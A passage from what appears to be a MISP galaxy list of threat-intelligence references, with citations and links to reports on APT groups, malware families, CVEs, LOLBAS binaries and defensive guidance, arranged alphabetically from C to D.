https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/

CrowdStrike Putter Panda

Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="CrowdStrike Putter Panda"

Table 13204. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

Softpedia MinerC

Cimpanu, C.. (2016, September 9). Cryptocurrency Mining Malware Discovered Targeting Seagate NAS Hard Drives. Retrieved October 12, 2016.

The tag is: misp-galaxy:references="Softpedia MinerC"

Table 13205. Table References

Links

http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml

Microsoft Cryptojacking 2023

Microsoft Threat Intelligence. (2023, July 25). Cryptojacking: Understanding and defending against cloud compute resource abuse. Retrieved September 5, 2023.

The tag is: misp-galaxy:references="Microsoft Cryptojacking 2023"

Table 13206. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/

Microsoft CryptUnprotectData April 2018

Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019.

The tag is: misp-galaxy:references="Microsoft CryptUnprotectData April 2018"

Table 13207. Table References

Links

https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata

Csc.exe - LOLBAS Project

LOLBAS. (2018, May 25). Csc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Csc.exe - LOLBAS Project"

Table 13208. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Csc/

Cscript.exe - LOLBAS Project

LOLBAS. (2018, May 25). Cscript.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Cscript.exe - LOLBAS Project"

Table 13209. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cscript/

csi.exe - LOLBAS Project

LOLBAS. (2018, May 25). csi.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="csi.exe - LOLBAS Project"

Table 13210. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/

OWASP CSV Injection

Albinowax Timo Goosen. (n.d.). CSV Injection. Retrieved February 7, 2022.

The tag is: misp-galaxy:references="OWASP CSV Injection"

Table 13211. Table References

Links

https://owasp.org/www-community/attacks/CSV_Injection

Microsoft Subkey

Microsoft. (n.d.). CurrentControlSet\Services Subkey Entries. Retrieved November 30, 2014.

The tag is: misp-galaxy:references="Microsoft Subkey"

Table 13212. Table References

Links

http://support.microsoft.com/KB/103000

Microsoft SolarWinds Customer Guidance

MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Microsoft SolarWinds Customer Guidance"

Table 13213. Table References

Links

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks

MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.

The tag is: misp-galaxy:references="Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks"

Table 13214. Table References

Links

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

Login Scripts Apple Dev

Apple. (2016, September 13). Customizing Login and Logout. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Login Scripts Apple Dev"

Table 13215. Table References

Links

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html

TechNet Screensaver GP

Microsoft. (n.d.). Customizing the Desktop. Retrieved December 5, 2017.

The tag is: misp-galaxy:references="TechNet Screensaver GP"

Table 13216. Table References

Links

https://technet.microsoft.com/library/cc938799.aspx

CustomShellHost.exe - LOLBAS Project

LOLBAS. (2021, November 14). CustomShellHost.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CustomShellHost.exe - LOLBAS Project"

Table 13217. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/

Symantec Naid in the Wild June 2012

Symantec Security Response. (2012, June 18). CVE-2012-1875 Exploited in the Wild - Part 1 (Trojan.Naid). Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Naid in the Wild June 2012"

Table 13218. Table References

Links

https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid

NVD CVE-2014-7169

National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="NVD CVE-2014-7169"

Table 13219. Table References

Links

https://nvd.nist.gov/vuln/detail/CVE-2014-7169

NVD CVE-2016-6662

National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="NVD CVE-2016-6662"

Table 13220. Table References

Links

https://nvd.nist.gov/vuln/detail/CVE-2016-6662

NVD CVE-2017-0176

National Vulnerability Database. (2017, June 22). CVE-2017-0176 Detail. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="NVD CVE-2017-0176"

Table 13221. Table References

Links

https://nvd.nist.gov/vuln/detail/CVE-2017-0176

FireEye Attacks Leveraging HTA

Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.

The tag is: misp-galaxy:references="FireEye Attacks Leveraging HTA"

Table 13222. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html

Microsoft CVE-2017-8625 Aug 2017

Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Microsoft CVE-2017-8625 Aug 2017"

Table 13223. Table References

Links

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625

NVD CVE-2019-3610

National Vulnerability Database. (2019, October 9). CVE-2019-3610 Detail. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="NVD CVE-2019-3610"

Table 13224. Table References

Links

https://nvd.nist.gov/vuln/detail/CVE-2019-3610

CVMServer Vuln

Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability in macOS and iOS. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="CVMServer Vuln"

Table 13225. Table References

Links

https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html

Crowdstrike Kubernetes Container Escape

Manoj Ahuje. (2022, January 31). CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit. Retrieved July 6, 2022.

The tag is: misp-galaxy:references="Crowdstrike Kubernetes Container Escape"

Table 13226. Table References

Links

https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/

CyberArk Labs Safe Mode 2016

Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="CyberArk Labs Safe Mode 2016"

Table 13227. Table References

Links

https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise

Cyware Ngrok May 2019

Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020.

The tag is: misp-galaxy:references="Cyware Ngrok May 2019"

Table 13228. Table References

Links

https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44

Microsoft Phosphorus Oct 2020

Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.

The tag is: misp-galaxy:references="Microsoft Phosphorus Oct 2020"

Table 13229. Table References

Links

https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/

Talos Seduploader Oct 2017

Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.

The tag is: misp-galaxy:references="Talos Seduploader Oct 2017"

Table 13230. Table References

Links

https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html

FBI. (2022, December 21). Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="FBI-search"

Table 13231. Table References

Links

https://www.ic3.gov/Media/Y2022/PSA221221

Secureworks GOLD KINGSWOOD September 2018

CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="Secureworks GOLD KINGSWOOD September 2018"

Table 13232. Table References

Links

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

Cybereason OSX Pirrit

Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.

The tag is: misp-galaxy:references="Cybereason OSX Pirrit"

Table 13233. Table References

Links

https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf

Zdnet Kimsuky Dec 2018

Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.

The tag is: misp-galaxy:references="Zdnet Kimsuky Dec 2018"

Table 13234. Table References

Links

https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/

FireEye APT32 May 2017

Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.

The tag is: misp-galaxy:references="FireEye APT32 May 2017"

Table 13235. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

Shadowserver Strategic Web Compromise

Adair, S., Moran, N. (2012, May 15). Cyber Espionage & Strategic Web Compromises – Trusted Websites Serving Dangerous Results. Retrieved March 13, 2018.

The tag is: misp-galaxy:references="Shadowserver Strategic Web Compromise"

Table 13236. Table References

Links

http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websites-serving-dangerous-results/

CyberKnow Tweet July 7 2022

Cyberknow20. (2022, July 7). CyberKnow Tweet July 7 2022. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="CyberKnow Tweet July 7 2022"

Table 13237. Table References

Links

https://twitter.com/Cyberknow20/status/1545059177587871749

NSA NCSC Turla OilRig

NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="NSA NCSC Turla OilRig"

Table 13238. Table References

Links

https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf

OPM Leak

Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="OPM Leak"

Table 13239. Table References

Links

https://www.opm.gov/cybersecurity/cybersecurity-incidents/

ExpressVPN PATH env Windows 2021

ExpressVPN Security Team. (2021, November 16). Cybersecurity lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.

The tag is: misp-galaxy:references="ExpressVPN PATH env Windows 2021"

Table 13240. Table References

Links

https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/

NCSC. (2022, February 23). Cyclops Blink Malware Analysis Report. Retrieved March 3, 2022.

The tag is: misp-galaxy:references="NCSC Cyclops Blink February 2022"

Table 13241. Table References

Links

https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf

Haquebord, F. et al. (2022, March 17). Cyclops Blink Sets Sights on Asus Routers. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="Trend Micro Cyclops Blink March 2022"

Table 13242. Table References

Links

https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

Cynet Ragnar Apr 2020

Gold, B. (2020, April 27). Cynet Detection Report: Ragnar Locker Ransomware. Retrieved June 29, 2020.

The tag is: misp-galaxy:references="Cynet Ragnar Apr 2020"

Table 13243. Table References

Links

https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/

Microsoft DACL May 2018

Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.

The tag is: misp-galaxy:references="Microsoft DACL May 2018"

Table 13244. Table References

Links

https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces

Apple Developer Doco Archive Launchd

Apple. (2016, September 13). Daemons and Services Programming Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021.

The tag is: misp-galaxy:references="Apple Developer Doco Archive Launchd"

Table 13245. Table References

Links

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

Picus Daixin Team October 24 2022

Huseyin Can Yuceel. (2022, October 24). Daixin Team Targets Healthcare Organizations with Ransomware Attacks. Retrieved December 1, 2023.

The tag is: misp-galaxy:references="Picus Daixin Team October 24 2022"

Table 13246. Table References

Links

https://www.picussecurity.com/resource/blog/daixin-team-targets-healthcare-organizations-with-ransomware-attacks

Medium Eli Salem GuLoader April 2021

Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.

The tag is: misp-galaxy:references="Medium Eli Salem GuLoader April 2021"

Table 13247. Table References

Links

https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4

Lookout Dark Caracal Jan 2018

Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Lookout Dark Caracal Jan 2018"

Table 13248. Table References

Links

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

Dark Clouds_Usenix_Mulazzani_08_2011

Martin Mulazzani, Sebastian Schrittwieser, Manuel Leithner, Markus Huber, and Edgar Weippl. (2011, August). Dark Clouds on the Horizon: Using Cloud Storage as Attack Vector and Online Slack Space. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="Dark Clouds_Usenix_Mulazzani_08_2011"

Table 13249. Table References

Links

https://www.usenix.org/conference/usenix-security-11/dark-clouds-horizon-using-cloud-storage-attack-vector-and-online-slack

TrendMicro DarkComet Sept 2014

TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="TrendMicro DarkComet Sept 2014"

Table 13250. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET

DarkGate Loader delivered via Teams - Truesec

Jakob Nordenlund. (2023, September 6). DarkGate Loader delivered via Teams - Truesec. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="DarkGate Loader delivered via Teams - Truesec"

Table 13251. Table References

Links

https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams

Bleeping Computer DarkGate October 14 2023

Sergiu Gatlan. (2023, October 14). DarkGate malware spreads through compromised Skype accounts. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Bleeping Computer DarkGate October 14 2023"

Table 13252. Table References

Links

https://www.bleepingcomputer.com/news/security/darkgate-malware-spreads-through-compromised-skype-accounts/

Trend Micro DarkGate October 12 2023

Trent Bessell, Ryan Maglaque, Aira Marcelo, Jack Walsh, David Walsh. (2023, October 12). DarkGate Opens Organizations for Attack via Skype, Teams. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Trend Micro DarkGate October 12 2023"

Table 13253. Table References

Links

https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html

DarkGate - Threat Breakdown Journey

0xToxin. (n.d.). DarkGate - Threat Breakdown Journey. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="DarkGate - Threat Breakdown Journey"

Table 13254. Table References

Links

https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/

Kaspersky Tomiris Sep 2021

Kwiatkoswki, I. and Delcher, P. (2021, September 29). DarkHalo After SolarWinds: the Tomiris connection. Retrieved December 27, 2021.

The tag is: misp-galaxy:references="Kaspersky Tomiris Sep 2021"

Table 13255. Table References

Links

https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/

Volexity SolarWinds

Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.

The tag is: misp-galaxy:references="Volexity SolarWinds"

Table 13256. Table References

Links

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

Securelist Darkhotel Aug 2015

Kaspersky Lab’s Global Research & Analysis Team. (2015, August 10). Darkhotel’s attacks in 2015. Retrieved November 2, 2018.

The tag is: misp-galaxy:references="Securelist Darkhotel Aug 2015"

Table 13257. Table References

Links

https://securelist.com/darkhotels-attacks-in-2015/71713/

Unit42 DarkHydrus Jan 2019

Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Unit42 DarkHydrus Jan 2019"

Table 13258. Table References

Links

https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/

Unit 42 Phishery Aug 2018

Falcone, R. (2018, August 07). DarkHydrus Uses Phishery to Harvest Credentials in the Middle East. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="Unit 42 Phishery Aug 2018"

Table 13259. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/

Darkside Ransomware Cybereason

Cybereason Nocturnus. (2021, April 1). Cybereason vs. Darkside Ransomware. Retrieved August 18, 2021.

The tag is: misp-galaxy:references="Darkside Ransomware Cybereason"

Table 13260. Table References

Links

https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware

DarkSide Ransomware Gang

Ramarcus Baylor. (2021, May 12). DarkSide Ransomware Gang: An Overview. Retrieved August 30, 2022.

The tag is: misp-galaxy:references="DarkSide Ransomware Gang"

Table 13261. Table References

Links

https://unit42.paloaltonetworks.com/darkside-ransomware/

Secureworks DarkTortilla Aug 2022

Secureworks Counter Threat Unit Research Team. (2022, August 17). DarkTortilla Malware Analysis. Retrieved November 3, 2022.

The tag is: misp-galaxy:references="Secureworks DarkTortilla Aug 2022"

Table 13262. Table References

Links

https://www.secureworks.com/research/darktortilla-malware-analysis

Securelist DarkVishnya Dec 2018

Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020.

The tag is: misp-galaxy:references="Securelist DarkVishnya Dec 2018"

Table 13263. Table References

Links

https://securelist.com/darkvishnya/89169/

Prevailion DarkWatchman 2021

Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.

The tag is: misp-galaxy:references="Prevailion DarkWatchman 2021"

Table 13264. Table References

Links

https://www.prevailion.com/darkwatchman-new-fileless-techniques/

Moran 2014

Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Moran 2014"

Table 13265. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

DataSvcUtil.exe - LOLBAS Project

LOLBAS. (2020, December 1). DataSvcUtil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="DataSvcUtil.exe - LOLBAS Project"

Table 13266. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/

Hijacking VNC

Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.

The tag is: misp-galaxy:references="Hijacking VNC"

Table 13267. Table References

Links

https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc

Microsoft COM ACL

Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Microsoft COM ACL"

Table 13268. Table References

Links

https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1

DCShadow Blog

Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018.

The tag is: misp-galaxy:references="DCShadow Blog"

Table 13269. Table References

Links

https://www.dcshadow.com/

GitHub DCSYNCMonitor

Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="GitHub DCSYNCMonitor"

Table 13270. Table References

Links

https://github.com/shellster/DCSYNCMonitor

DD Man

Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="DD Man"

Table 13271. Table References

Links

http://man7.org/linux/man-pages/man1/dd.1.html

Arbor SSLDoS April 2012

ASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Arbor SSLDoS April 2012"

Table 13272. Table References

Links

https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new

CERT-EU DDoS March 2017

Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019.

The tag is: misp-galaxy:references="CERT-EU DDoS March 2017"

Table 13273. Table References

Links

http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf

Unit42 Sofacy Dec 2018

Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="Unit42 Sofacy Dec 2018"

Table 13274. Table References

Links

https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

Death by 1000 installers; it’s all broken!

Patrick Wardle. (2017). Death by 1000 installers; it’s all broken!. Retrieved August 8, 2019.

The tag is: misp-galaxy:references="Death by 1000 installers; it’s all broken!"

Table 13275. Table References

Links

https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8

SpecterOps Lateral Movement from Azure to On-Prem AD 2020

Andy Robbins. (2020, August 17). Death from Above: Lateral Movement from Azure to On-Prem AD. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="SpecterOps Lateral Movement from Azure to On-Prem AD 2020"

Table 13276. Table References

Links

https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d

Microsoft PowerShell SilentlyContinue

Microsoft. (2023, March 2). $DebugPreference. Retrieved August 30, 2023.

The tag is: misp-galaxy:references="Microsoft PowerShell SilentlyContinue"

Table 13277. Table References

Links

https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference

virtualization.info 2006

virtualization.info. (Interviewer) & Liguori, A. (Interviewee). (2006, August 11). Debunking Blue Pill myth [Interview transcript]. Retrieved November 13, 2014.

The tag is: misp-galaxy:references="virtualization.info 2006"

Table 13278. Table References

Links

http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html

TrendMicro Confucius APT Feb 2018

Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group’s Cyberespionage Operations. Retrieved December 26, 2021.

The tag is: misp-galaxy:references="TrendMicro Confucius APT Feb 2018"

Table 13279. Table References

Links

https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html

Ciberseguridad Decoding malicious RTF files

Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.

The tag is: misp-galaxy:references="Ciberseguridad Decoding malicious RTF files"

Table 13280. Table References

Links

https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/

Nccgroup Gh0st April 2018

Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.

The tag is: misp-galaxy:references="Nccgroup Gh0st April 2018"

Table 13281. Table References

Links

https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/

MalwareBytes Template Injection OCT 2017

Segura, J. (2017, October 13). Decoy Microsoft Word document delivers malware through a RAT. Retrieved July 21, 2018.

The tag is: misp-galaxy:references="MalwareBytes Template Injection OCT 2017"

Table 13282. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/

Crowdstrike PartyTicket March 2022

Crowdstrike. (2022, March 1). Decryptable PartyTicket Ransomware Reportedly Targeting Ukrainian Entities. Retrieved March 1, 2022.

The tag is: misp-galaxy:references="Crowdstrike PartyTicket March 2022"

Table 13283. Table References

Links

https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine

Fortinet Emotet May 2017

Xiaopeng Zhang. (2017, May 3). Deep Analysis of New Emotet Variant – Part 1. Retrieved April 1, 2019.

The tag is: misp-galaxy:references="Fortinet Emotet May 2017"

Table 13284. Table References

Links

https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-1.html

Aqua TeamTNT August 2020

Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Aqua TeamTNT August 2020"

Table 13285. Table References

Links

https://blog.aquasec.com/container-security-tnt-container-attack

Bitdefender FIN8 July 2021

Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021.

The tag is: misp-galaxy:references="Bitdefender FIN8 July 2021"

Table 13286. Table References

Links

https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation

Sophos Pikabot June 12 2023

Karl Ackerman. (2023, June 12). Deep dive into the Pikabot cyber threat. Retrieved January 11, 2024.

The tag is: misp-galaxy:references="Sophos Pikabot June 12 2023"

Table 13287. Table References

Links

https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/

Microsoft Deep Dive Solorigate January 2021

MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.

The tag is: misp-galaxy:references="Microsoft Deep Dive Solorigate January 2021"

Table 13288. Table References

Links

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

AADInternals - Device Registration

Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD device join. Retrieved March 9, 2022.

The tag is: misp-galaxy:references="AADInternals - Device Registration"

Table 13289. Table References

Links

https://o365blog.com/post/devices/

Alperovitch 2014

Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Alperovitch 2014"

Table 13290. Table References

Links

https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/

DefaultPack.EXE - LOLBAS Project

LOLBAS. (2020, October 1). DefaultPack.EXE. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="DefaultPack.EXE - LOLBAS Project"

Table 13291. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/

Lastline DarkHotel Just In Time Decryption Nov 2015

Arunpreet Singh, Clemens Kolbitsch. (2015, November 5). Defeating Darkhotel Just-In-Time Decryption. Retrieved April 15, 2021.

The tag is: misp-galaxy:references="Lastline DarkHotel Just In Time Decryption Nov 2015"

Table 13292. Table References

Links

https://www.lastline.com/labsblog/defeating-darkhotel-just-in-time-decryption/

piazza launch agent mitigation

Antonio Piazza (4n7m4n). (2021, November 23). Defeating Malicious Launch Persistence. Retrieved April 19, 2022.

The tag is: misp-galaxy:references="piazza launch agent mitigation"

Table 13293. Table References

Links

https://antman1p-30185.medium.com/defeating-malicious-launch-persistence-156e2b40fc67

VectorSec ForFiles Aug 2017

vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="VectorSec ForFiles Aug 2017"

Table 13294. Table References

Links

https://twitter.com/vector_sec/status/896049052642533376

Black Hat 2015 App Shim

Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.

The tag is: misp-galaxy:references="Black Hat 2015 App Shim"

Table 13295. Table References

Links

https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf

TechNet O365 Outlook Rules

Koeller, B.. (2018, February 21). Defending Against Rules and Forms Injection. Retrieved November 5, 2019.

The tag is: misp-galaxy:references="TechNet O365 Outlook Rules"

Table 13296. Table References

Links

https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/

Defending Against Scheduled Task Attacks in Windows Environments

Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022.

The tag is: misp-galaxy:references="Defending Against Scheduled Task Attacks in Windows Environments"

Table 13297. Table References

Links

https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments

Rapid7 HAFNIUM Mar 2021

Eoin Miller. (2021, March 23). Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange. Retrieved October 27, 2022.

The tag is: misp-galaxy:references="Rapid7 HAFNIUM Mar 2021"

Table 13298. Table References

Links

https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/

Microsoft SQL Server

